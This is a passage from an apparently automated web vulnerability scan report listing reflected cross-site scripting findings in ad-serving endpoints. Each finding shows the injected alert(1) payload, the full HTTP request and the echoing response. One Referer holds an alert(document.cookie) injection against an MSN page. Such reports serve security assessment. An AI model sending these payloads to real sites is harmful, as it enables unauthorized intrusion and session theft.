<param name="FlashVars" value="ArmClickType='+ armapi_ArmClickType + '&unique_id=_ISA1292630112506&ArmApi=armapi_a1_a1&ArmClickUrl=http://clk.redcated/go/286026710/direct17047';d5b850e643;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct17047';d5b850e643;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.atdmt.com/go/2860
...[SNIP]...

5.279. http://redcated/DEN/jview/286026710/direct [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/DEN/jview/286026710/direct

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70d95'-alert(1)-'4fb7f8f1dba was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=70d95'-alert(1)-'4fb7f8f1dba HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6546
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:51 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...
f ( "%OOB%" == "1" )
_strContentISA1292630112506 = _strContentISA1292630112506.replace(/!~!click!~!/g,'');
else
_strContentISA1292630112506 = _strContentISA1292630112506.replace(/!~!click!~!/g,'70d95'-alert(1)-'4fb7f8f1dba');

}
else
{
_strContentISA1292630112506 = '<a target="_blank" href="http://clk.atdmt.com/go/286026710/direct;vt.1;ai.195291342;ct.1/01/" onclick="if(\'70d95'-alert(1)-'4fb7f8f1dba\')(new
...[SNIP]...

5.280. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/DEN/jview/286026710/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7580e"-alert(1)-"89273f46f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&7580e"-alert(1)-"89273f46f38=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 5866
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:01 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 8;
var bIsRightVersion = f
...[SNIP]...
nt.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}

}
detectPluginISA1288888885066();

var _ISA1288888885066_Instance =
{
click : "&7580e"-alert(1)-"89273f46f38=1",
clickThruUrl: "http://clk.redcated/go/286026710/direct;vt.1;ai.189504609;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(u
...[SNIP]...

5.281. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/DEN/jview/286026710/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b28'-alert(1)-'25084a46f21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&f6b28'-alert(1)-'25084a46f21=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6573
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:03 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 8;
var bIsRightVersion = fal
...[SNIP]...
( "%OOB%" == "1" )
_strContentISA1292628901264 = _strContentISA1292628901264.replace(/!~!click!~!/g,'');
else
_strContentISA1292628901264 = _strContentISA1292628901264.replace(/!~!click!~!/g,'&f6b28'-alert(1)-'25084a46f21=1');

}
else
{
_strContentISA1292628901264 = '<a target="_blank" href="http://clk.atdmt.com/go/286026710/direct;vt.1;ai.195284525;ct.1/01/" onclick="if(\'&f6b28'-alert(1)-'25084a46f21=1\')
...[SNIP]...

5.282. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1215c</script><script>alert(1)</script>cfe86179be9 was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=1215c</script><script>alert(1)</script>cfe86179be9 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6482
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:38 GMT

<html>
<head>
<title>BND_IstanbulHT_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIT8217023605879();
var _CIT8217023605879_Instance =
{
click : "1215c</script><script>alert(1)</script>cfe86179be9",
clickThruUrl: "http://clk.redcated/go/264935949/direct;wi.300;hi.250;ai.199548164;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

5.283. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda0a'-alert(1)-'bb646d27c0c was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=cda0a'-alert(1)-'bb646d27c0c HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6706
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:40 GMT

<html>
<head>
<title>BND_Goodson2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'');
else
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'cda0a'-alert(1)-'bb646d27c0c');
}
else
{
_strContentCIT8003109364835 = '<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.197994903;ct.1/01/" onclick="if(\'cda0a'-alert(1)-'bb646d27c0c\')(n
...[SNIP]...

5.284. http://redcated/NYC/iview/264935949/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d623e'%3b444294c40e was submitted in the REST URL parameter 4. This input was echoed as d623e';444294c40e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /NYC/iview/264935949/directd623e'%3b444294c40e;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6382
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:05:06 GMT

<html>
<head>
<title>BND_IstSpice_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/AANYCCITICIT/CitiBrand2H/BND_IstSpice_FL_300x250_MSN.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/264935949/directd623e';444294c40e;wi.300;hi.250;ai.199548196;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/264935949/directd623e';444294c40e;wi.300;hi.250;ai.199548196;ct.1/01" />
...[SNIP]...

5.285. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54cc3"-alert(1)-"5d7a2901fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&54cc3"-alert(1)-"5d7a2901fc7=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6394
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:49 GMT

<html>
<head>
<title>BND_IstanbulHT_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIT8217023605879();
var _CIT8217023605879_Instance =
{
click : "&54cc3"-alert(1)-"5d7a2901fc7=1",
clickThruUrl: "http://clk.redcated/go/264935949/direct;wi.300;hi.250;ai.199548164;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

5.286. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97af1"><script>alert(1)</script>8e072145e04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&97af1"><script>alert(1)</script>8e072145e04=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6459
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:47 GMT

<html>
<head>
<title>BND_IstSpice_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.199548196;ct.1/01/" onclick="if(\'&97af1"><script>alert(1)</script>8e072145e04=1\')(new Image).src=\'&97af1">
...[SNIP]...

5.287. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d20a'-alert(1)-'4fe7bcd4f48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&5d20a'-alert(1)-'4fe7bcd4f48=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6721
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:51 GMT

<html>
<head>
<title>BND_Goodson2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'');
else
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'&5d20a'-alert(1)-'4fe7bcd4f48=1');
}
else
{
_strContentCIT8003109364835 = '<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.197994903;ct.1/01/" onclick="if(\'&5d20a'-alert(1)-'4fe7bcd4f48=1
...[SNIP]...

5.288. http://redcated/PTR/jview/240321567/direct [wi.1;hi.1/01?relocate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/PTR/jview/240321567/direct

Issue detail

The value of the wi.1;hi.1/01?relocate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f28'-alert(1)-'ecdf65e1367 was submitted in the wi.1;hi.1/01?relocate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link11f28'-alert(1)-'ecdf65e1367 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 420
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:39 GMT

document.writeln('<scr' + 'ipt src="' + 'http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link11f28'-alert(1)-'ecdf65e1367' + '/ATCI=' + '1294100002-3786607' + '">
...[SNIP]...

5.289. http://redcated/ULA/iview/296652509/direct [/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec58</script><script>alert(1)</script>71466742f94 was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ULA/iview/296652509/direct;/01?click=dec58</script><script>alert(1)</script>71466742f94 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6410
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:47 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSEL1295550373680();
var _SEL1295550373680_Instance =
{
click : "dec58</script><script>alert(1)</script>71466742f94",
clickThruUrl: "http://clk.redcated/go/296652509/direct;ai.200329627;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

5.290. http://redcated/ULA/iview/296652509/direct [/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17000'-alert(1)-'f899d3d5d6a was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ULA/iview/296652509/direct;/01?click=17000'-alert(1)-'f899d3d5d6a HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6300
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:48 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'');
else
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'17000'-alert(1)-'f899d3d5d6a');
}
else
{
_strContentSEL1295550373680 = '<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'17000'-alert(1)-'f899d3d5d6a\')(new Image).src=
...[SNIP]...

5.291. http://redcated/ULA/iview/296652509/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9618f'%3b93d1eb33974 was submitted in the REST URL parameter 4. This input was echoed as 9618f';93d1eb33974 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ULA/iview/296652509/direct9618f'%3b93d1eb33974 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6322
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:22:34 GMT
Connection: close

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/UXULASONYSEL/BloggieHoliday_HD_PC/Flash_300x250_HD_PC_promo.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/296652509/direct9618f';93d1eb33974;ai.200329627;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/296652509/direct9618f';93d1eb33974;ai.200329627;ct.1/01" />
...[SNIP]...

5.292. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87a3"><script>alert(1)</script>91400ea4a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ULA/iview/296652509/direct;/01?click=&b87a3"><script>alert(1)</script>91400ea4a5a=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6390
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:56 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'&b87a3"><script>alert(1)</script>91400ea4a5a=1\')(new Image).src=\'&b87a3">
...[SNIP]...

5.293. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

